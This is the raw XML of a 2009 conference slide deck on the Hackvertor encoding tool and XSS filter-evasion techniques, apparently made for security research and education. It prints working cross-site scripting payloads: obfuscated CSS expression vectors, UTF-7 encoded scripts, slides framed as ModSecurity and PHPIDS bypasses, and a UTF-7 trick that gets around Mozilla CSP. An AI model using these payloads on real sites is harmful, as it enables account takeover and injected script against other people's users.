            <a:endParaRPr lang="en-GB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UTF-8 DOM based XSS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Javascript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end statements are ;,\n right?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Not in UTF-8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&lt;script&gt;x = '' alert(1)//'&lt;/script&gt; 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Paragraph separator and line separator are end statements within UTF-8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?x=%27%E2%80%A9alert%281%29//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?x=%27%E2%80%A8alert%281%29//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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Charsets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/URI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Hackvertor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supports selective UTF-7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Great for filter evasion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Great for breaking other things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Malformed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uri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encoding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Overlong UTF-8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First nibble, second nibble encoding etc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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://tinyurl.com/charset-uri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Advanced expression vectors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&lt;////////////////style========</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a: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=expression(window.x?0:(alert(/XSS/),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>window.x</a:t>
            </a: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=1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))&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95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Hackvertor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automatically generates a nice expression which doesn’t DOS the browser when executed multiple times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Test expressions with HTML Test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Hackvertor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includes a expression generator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Expression can be encoded in different ways depending on the position before the : or =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How was it born?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2924180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Inspired from the PHP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charset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encoder by Mario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Heiderich</a:t>
            </a:r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Hacking the PHPIDS A LOT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Storing all my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fuzzing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/conversion code in one place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My obsession with XSS &amp;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Javascript</a:t>
            </a:r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The need to do selective multiple nested conversions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A central resource for common evasion techniques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Advanced expression vectors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 lnSpcReduction="10000"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style======================= multiple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style=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abc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or \0061\0062\0063 \0061\0062\0000063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style=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abc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: or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abc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&amp;#58; or &amp;#58 or &amp;#x3a;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style=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abc:expression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(alert(1)) can be html encoded and hex escaped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Literally millions of possibilities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&lt;div style="\000000000000000000000078\000000000000000000000073s:e&amp;#x5c;&amp;#x78;p&amp;#47;&amp;#42;&amp;#106;&amp;#110;&amp;#118;&amp;#42;&amp;#47;\0072\0065ssion(window.x?0:(alert(/XSS/),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window.x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=1));"&gt;&lt;/div&gt;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Advanced expression vectors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CSS hex escapes can be follow by spaces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Comments can be encoded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xss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=expression(alert(1)) works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= can be encoded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This is why you need to use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Hackvertor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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bypass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CSS escapes with hex malformed entities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Unicode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js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escapes with hex entity encoding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x is obtained from the attribute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``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backticks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are used to bypass rules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document is relative to the expression as it’s within a attribute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&lt;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div/style=`-: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expressio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&amp;#x5c&amp;#x36&amp;#x65(\u006&amp;#x34;omai&amp;#x6e=x)` x=modsecurity.org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PHPIDS bypass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CSS escapes again with malformed hex entities (a personal favourite)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= assignment instead of :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execScript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with filter evasion tricks like –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Force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vbs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with second argument obtained from attributes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&lt;div/style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=-=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expressio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&amp;#x5c&amp;#x36&amp;#x65(-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execScript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x,y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)-x) x=MsgBox-1 y=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vbs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&gt;</a:t>
            </a:r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CSS expressions with UTF-7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 fontScale="92500" lnSpcReduction="10000"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UTF-7 BOM character can force UTF-7 in a external style sheet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Would you let me upload a style sheet?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@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charset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‘UTF-7’; works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But you don’t need it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+/v8 is all you need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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+/v8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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body {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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	font-family: '+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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}</a:t>
            </a:r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UTF-7 Kung fu lesson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Just +ADw-script+AD4-alert(1)+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ADw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-/script+AD4- ?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All browsers decode a full encoded UTF-7 string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>very useful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b="1" u="sng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b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>data:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/utf-7,+AGEAbABlAHIAdAAoADEAKQ- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=utf-7&gt;&lt;/script&gt;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b="1" u="sng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Yeah you can html entity encode that as well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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Useful for filter and WAF evasion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b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://tinyurl.com/utf-7-script </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" u="sng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UTF-7 Kung fu lesson continued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Multiple BOM characters allow UTF-7 to be executed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BOM character has to be first character</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" u="sng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Not that useful but still interesting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%2B%2F%76%38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%2B%2F%76%39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%2B%2F%76%2b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%2B%2F%76%2f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%</a:t>
            </a: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2B%2F%76%38%20%2BADw-script%2BAD4-alert(1)%2BADw-%2Fscript%2BAD4-</a:t>
            </a:r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Mozilla CSP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Content Security Policy is intended to mitigate a large class of Web Application Vulnerabilities: Cross Site Scripting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Whitelisted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script sources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Prevents attribute events and inline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script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Options to disable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eval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setTimeout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and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setInterval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to prevent obfuscation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It’s a bit like the death star for XSS</a:t>
            </a:r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Mozilla CSP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Fortunately we have a crazy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x-wing pilot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We use the site against itself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JSON requests can be used but what if no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callback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is used?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The JSON is escaped correctly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Can we still break it?  </a:t>
            </a:r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Mozilla CSP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“&gt;&lt;script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src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=“http://some.website/test.json&gt;&lt;/script&gt;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JSON request contains (static or dynamic):-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[{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'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]</a:t>
            </a:r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How does it work?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Start of tag &lt;@dec_ent_0(;)&gt;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End of tag &lt;@/dec_ent_0&gt;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(;) == Parameters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E.g. (;) is like doing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funcCall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(‘;’) in programming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Similar to HTML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Works like nested Functions in programming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Converts from the inside to the outside tag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Multiple layers of conversions and selections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Mozilla CSP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Once JSON is decoded from the forced UTF-7 the request looks like:-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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[{'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friend':'luke','email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':''}];alert('May the force be with you');[{'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job':'done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'}]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Demo available here:-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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http://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www.businessinfo.co.uk/labs/cspluke/test.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Mozilla CSP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Using CSP remember to always filter your data regardless (some vectors my still slip through)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Mitigation for CSP disable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charset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attribute of script tag (unlikely)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Filter or remove UTF-7 from script tags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Why have UTF-7 from script anyway?</a:t>
            </a:r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000240"/>
            <a:ext cx="7620000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Thanks &amp; questions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Thanks to:-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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l"/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Eduardo Vela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(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Sirdarckcat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) for helping with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Hackvertor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and being awesome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, Mario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Heiderich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for PHPIDS and PCE,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Lars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Strojny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&amp; Christian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Matthies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for PHPIDS and finally David Lindsay for hacking PHPIDS with me</a:t>
            </a:r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Why use it?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You don’t have to write the same code a million different ways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It’s quicker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Quick testing with HTML and property inspectors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You can find hidden stuff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You can access it from anywhere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Share your conversions easily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Practical example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Start with vector you want to encode:-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&lt;div style="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xss:expression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(alert(1));"&gt;&lt;/div&gt;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Select the area that you wish to encode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&lt;div style="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xss:expression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(alert(1));"&gt;&lt;/div&gt;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Select your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Hackvertor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category “Encode”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Click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dec_ent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&lt;div style="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xss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:&lt;@dec_ent_5(;)&gt;expression&lt;@/dec_ent_5&gt;(alert(1));"&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428860" y="4143380"/>
            <a:ext cx="1428760" cy="28575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Practical example continued.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Result of conversion: &lt;div style="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xss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:&amp;#101;&amp;#120;&amp;#112;&amp;#114;&amp;#101;&amp;#115;&amp;#115;&amp;#105;&amp;#111;&amp;#110;(alert(1));"&gt;&lt;/div&gt;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Multiple tags can be layered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Vector can be tested using “Test HTML”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Common inputs are included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5786" y="3071810"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A quick demo…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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928803"/>
            <a:ext cx="7986714" cy="785817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Helpful shortcuts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14282" y="2714620"/>
            <a:ext cx="8786874" cy="4143380"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Hackvertor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isn’t just XSS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Quickly create arrays using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arrayify</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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&lt;@arrayify_6([^\w],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js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)&gt;test1;test2,test3#;test4&lt;@/arrayify_6&gt;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Arrayify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takes two parameters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RegExp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to split the string and the desired array type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"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var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GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>myArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = ['test1','test2','test3','test4'];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1891</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>234</Paragraphs>
  <Slides>43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Office Theme</vt:lpstr>
      <vt:lpstr>XSS Lightsabre techniques</vt:lpstr>
      <vt:lpstr>What is Hackvertor?</vt:lpstr>
      <vt:lpstr>How was it born?</vt:lpstr>
      <vt:lpstr>How does it work?</vt:lpstr>
      <vt:lpstr>Why use it?</vt:lpstr>
      <vt:lpstr>Practical example</vt:lpstr>
      <vt:lpstr>Practical example continued.</vt:lpstr>
      <vt:lpstr>A quick demo…</vt:lpstr>
      <vt:lpstr>Helpful shortcuts</vt:lpstr>
      <vt:lpstr>Helpful shortcuts continued</vt:lpstr>
      <vt:lpstr>Hackvertlets</vt:lpstr>
      <vt:lpstr>The techniques…</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion examples</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion examples</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion</vt:lpstr>
      <vt:lpstr>Obfuscation/Filter evasion</vt:lpstr>
      <vt:lpstr>Slide 20</vt:lpstr>
      <vt:lpstr>Twitter</vt:lpstr>
      <vt:lpstr>Twitter</vt:lpstr>
      <vt:lpstr>Lets tweet these results</vt:lpstr>
      <vt:lpstr>Slide 24</vt:lpstr>
      <vt:lpstr>Replicate tests in Hackvertor</vt:lpstr>
      <vt:lpstr>Slide 26</vt:lpstr>
      <vt:lpstr>UTF-8 DOM based XSS</vt:lpstr>
      <vt:lpstr>Charsets/URI</vt:lpstr>
      <vt:lpstr>Advanced expression vectors</vt:lpstr>
      <vt:lpstr>Advanced expression vectors</vt:lpstr>
      <vt:lpstr>Advanced expression vectors</vt:lpstr>
      <vt:lpstr>Modsecurity bypass</vt:lpstr>
      <vt:lpstr>PHPIDS bypass</vt:lpstr>
      <vt:lpstr>CSS expressions with UTF-7</vt:lpstr>
      <vt:lpstr>UTF-7 Kung fu lesson</vt:lpstr>
      <vt:lpstr>UTF-7 Kung fu lesson continued</vt:lpstr>
      <vt:lpstr>Mozilla CSP</vt:lpstr>
      <vt:lpstr>Mozilla CSP</vt:lpstr>
      <vt:lpstr>Mozilla CSP</vt:lpstr>
      <vt:lpstr>Mozilla CSP</vt:lpstr>
      <vt:lpstr>Mozilla CSP</vt:lpstr>
      <vt:lpstr>Slide 42</vt:lpstr>
      <vt:lpstr>Thanks &amp; questions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XSS Lightsabre techniques</dc:title>
  <dc:creator>Gareth Heyes</dc:creator>
  <cp:lastModifiedBy>gareth</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-11-03T19:31:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-11-18T22:42:59Z</dcterms:modified>
</cp:coreProperties>
</file>